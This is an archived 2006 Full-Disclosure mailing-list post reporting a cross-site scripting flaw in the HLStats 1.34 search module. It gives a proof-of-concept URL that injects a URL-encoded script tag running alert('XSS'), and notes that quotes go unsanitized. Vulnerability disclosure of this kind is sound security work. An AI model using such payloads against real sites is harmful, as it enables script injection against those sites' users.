|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
[Full-disclosure] XSS in HLStats 1.34
From: kefka (kefka
kevinbeardsucks.com)
Date: Tue Aug 29 2006 - 02:47:29 CDT
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
Cross-site Scripting Vulnerability in HLStats 1.34
hlstats.php?mode=search&game=cstrike&st=player&q=%22%3CSCRIPT%3Ealert%28%22XSS%22%29%3B%3C%2FSCRIPT%3E%22
Search module fails to sanitize quotes.
kefka
kefkakevinbeardsucks.com
Thanks to RSnake
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]